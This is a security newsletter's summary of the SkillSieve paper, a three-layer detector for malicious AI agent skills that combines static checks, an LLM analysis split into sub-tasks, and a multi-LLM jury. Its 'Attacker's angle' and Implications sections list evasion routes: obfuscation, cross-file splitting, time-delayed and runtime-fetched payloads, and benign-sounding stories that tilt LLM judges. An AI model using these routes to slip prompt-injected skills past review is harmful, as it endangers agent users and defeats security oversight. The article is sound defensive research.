New to ShortSpan? We distil the AI-security research that matters into practitioner takeaways — edited by Ben Williams (NCC Group). Get the weekly email

// Analysis

SkillSieve triages malicious agent skills with LLM jury

Published: Thu, Apr 09, 2026 • By Rowan Vale

Agents

SkillSieve tackles malicious AI agent skills by mixing fast static checks with structured Large Language Model analysis and a multi-LLM jury. It filters 86% of benign skills in ~39 ms, hits F1 0.800 on a 400-skill benchmark, catches diverse evasions, and keeps average scan cost near USD 0.006 per skill.

Agent marketplaces are a supply-chain headache waiting to happen. OpenClaw’s ClawHub hosts over 13,000 community skills, and recent audits say 13% to 26% carry vulnerabilities. The nasty bit is where these hide: not just in code, but in the SKILL.md instructions that steer the agent. Static analysers stare at code. Regex catches only what it can see. Prompt injection, social engineering, and obfuscated payloads slip right through.

How SkillSieve works

SkillSieve is a layered triage pipeline that saves money and time by going deep only when needed. Layer 1 is a fast static pass: regex rules, abstract syntax tree features for Python, Bash and JavaScript, and metadata pulled from SKILL.md. A heuristic or optional XGBoost scorer decides whether to stop or escalate. This on-device pass filters roughly 86% of benign skills in about 39 ms with zero API cost. They processed 49,592 ClawHub skills on a USD 440 ARM single-board computer; Layer 1 alone ran in 31 minutes at 38.8 ms per skill.

Layer 2 is Structured Semantic Decomposition. Instead of asking one vague question to a Large Language Model (LLM), SkillSieve splits the job into four parallel checks: intent alignment, permission justification, covert behaviour detection, and cross-file consistency. Each returns structured JSON with a risk score, then the system fuses them. That decomposition matters. A single broad prompt missed many disguised attacks that the focused sub-tasks caught.

Layer 3 is a Multi-LLM Jury. Three different LLMs vote independently. If they disagree, they share structured reasoning and re-vote. On a 20-case borderline set, that debate triggered in 39% of sessions and produced unanimous or majority verdicts in most cases, leaving only truly murky skills for humans.

Attacker’s angle

The paper lists the usual goals: lift credentials, exfiltrate data, pop remote shells, and manipulate users via prompt injection and social engineering. Evasion is where it gets fun. They generated adversarial samples using encoding obfuscation, cross-file logic splitting, conditional triggers, homoglyph substitution and time-delayed payloads. SkillSieve intercepted all 100 such samples in their tests, with different layers tripping on different tricks. Still, there are gaps worth probing. The system scans package contents statically, so payloads fetched at runtime can stay invisible. Time-delayed logic remains hard because it looks inert when scanned. And because Layers 2 and 3 lean on LLMs, model variance and bias are attack surfaces; a convincing benign story might tip a lenient model. Pure name impersonation also sits outside its content scope.

Results are solid: on a 400-skill benchmark, SkillSieve scored F1 0.800 (precision 0.752, recall 0.854), beating the regex baseline ClawVet at 0.421, with average API spend about USD 0.006 per skill. Code, data and the benchmark are open-sourced. The next interesting questions are dynamic: how to catch runtime fetches, handle time bombs robustly, and pick jury models that resist targeted bias.

Additional analysis of the original ArXiv paper

📋 Original Paper Title and Abstract

SkillSieve: A Hierarchical Triage Framework for Detecting Malicious AI Agent Skills

Authors: Yinghan Hou and Zongyou Yang

OpenClaw's ClawHub marketplace hosts over 13,000 community-contributed agent skills, and between 13% and 26% of them contain security vulnerabilities according to recent audits. Regex scanners miss obfuscated payloads; formal static analyzers cannot read the natural language instructions in SKILL.md files where prompt injection and social engineering attacks hide. Neither approach handles both modalities. SkillSieve is a three-layer detection framework that applies progressively deeper analysis only where needed. Layer 1 runs regex, AST, and metadata checks through an XGBoost-based feature scorer, filtering roughly 86% of benign skills in under 40ms on average at zero API cost. Layer 2 sends suspicious skills to an LLM, but instead of asking one broad question, it splits the analysis into four parallel sub-tasks (intent alignment, permission justification, covert behavior detection, cross-file consistency), each with its own prompt and structured output. Layer 3 puts high-risk skills before a jury of three different LLMs that vote independently and, if they disagree, debate before reaching a verdict. We evaluate on 49,592 real ClawHub skills and adversarial samples across five evasion techniques, running the full pipeline on a 440 ARM single-board computer. On a 400-skill labeled benchmark, SkillSieve achieves 0.800 F1, outperforming ClawVet's 0.421, at an average cost of 0.006 per skill. Code, data, and benchmark are open-sourced.

🔍 ShortSpan Analysis of the Paper

Problem

The paper investigates detection of malicious or misused AI agent skills in public marketplaces. Skills combine natural language instructions and optional executable scripts, which enables attacks such as credential theft, data exfiltration, remote code execution and social engineering. Existing scanners either match patterns in code or analyse executable content but fail to read free‑text SKILL.md instructions where prompt injection and social engineering hide; single‑model LLM analysis is brittle. This leaves agent registries vulnerable to supply‑chain and prompt‑injection threats and creates a need for a cost‑effective, explainable scanning pipeline that handles both code and prose.

Approach

SkillSieve is a three‑layer hierarchical triage framework that applies progressively deeper checks only for suspicious skills. Layer 1 is a fast static triage combining regex rules, AST features from parsed Python/Bash/JavaScript, and metadata from SKILL.md to produce a risk score via a heuristic (and optionally an XGBoost model). It runs on‑device with no API cost and filters roughly 86% of skills in about 39 ms on average. Layer 2 is Structured Semantic Decomposition: suspicious skills are analysed by an LLM using four parallel sub‑tasks focused on intent alignment, permission justification, covert behaviour detection and cross‑file consistency; each sub‑task returns structured JSON and a risk score that are combined into an overall Layer 2 score. Layer 3 is a Multi‑LLM Jury Protocol: three independent LLMs vote; if they disagree they exchange structured reasoning and re‑vote, producing an explainable verdict or flagging the skill for human review.

Key Findings

Detection performance on a 400‑skill labelled benchmark: SkillSieve (Layer 1 + SSD) achieves F1 = 0.800 (precision 0.752, recall 0.854), outperforming a regex baseline ClawVet (F1 = 0.421).
Cost and efficiency: average API cost per skill is about USD 0.006 because 86% of skills are resolved at Layer 1 for free; the full 49,592‑skill ClawHub archive was processed on a USD 440 ARM single‑board computer, with Layer 1 scanning in 31 minutes at 38.8 ms per skill.
Adversarial robustness: across five evasion techniques (encoding obfuscation, cross‑file logic splitting, conditional triggers, homoglyph substitution, time‑delayed payloads) SkillSieve intercepted all 100 generated adversarial samples in the evaluation; different techniques produce distinct per‑layer interception patterns.
Decomposition improves recall: a single broad LLM prompt missed many disguised attacks that SSD caught by examining security dimensions independently.
Layer 3 jury and debate reduced ambiguous cases: in a 20‑case borderline set the debate phase activated in 39% of jury sessions and produced unanimous or majority verdicts in most cases, deferring only genuinely ambiguous skills to humans.

Limitations

SkillSieve operates on static package contents and cannot detect payloads fetched at runtime. Time‑delayed attacks remain especially challenging because malicious logic can appear inert at scan time. Layers 2 and 3 depend on non‑deterministic LLM outputs and inherit model biases; while debate reduces some uncertainty, variance and vendor differences persist. Pure name impersonation without malicious content is outside the content‑focused scope and requires registry‑wide name analysis.

Implications

Offensive security implications include clear goals an attacker can pursue by weaponising skills: exfiltrating credentials, establishing remote shells, or manipulating agents via prompt injection and social engineering. The paper shows attackers can combine evasion techniques such as cross‑file splitting, encoding obfuscation, conditional triggers, homoglyphs and time delays to reduce static signals. Because Layers 2 and 3 rely on LLMs, attackers might also exploit model biases or non‑determinism to produce plausible benign explanations or to target models that lean toward false negatives. Runtime fetching of payloads or purely registry‑level impersonation remain practical avenues for evasion under the current static and semantic scanning setup.

Links Original paper on arXiv

SkillSieve triages malicious agent skills with LLM jury

How SkillSieve works

Attacker’s angle

📋 Original Paper Title and Abstract

SkillSieve: A Hierarchical Triage Framework for Detecting Malicious AI Agent Skills

🔍 ShortSpan Analysis of the Paper

Problem

Approach

Key Findings

Limitations

Implications

Related Articles

Scanners miss malicious agent skills across marketplaces

SkillAttack maps prompt-only exploits in agent skills

Black-Box Skill Theft Exposes LLM Agent Market

Related Research

Get the weekly digest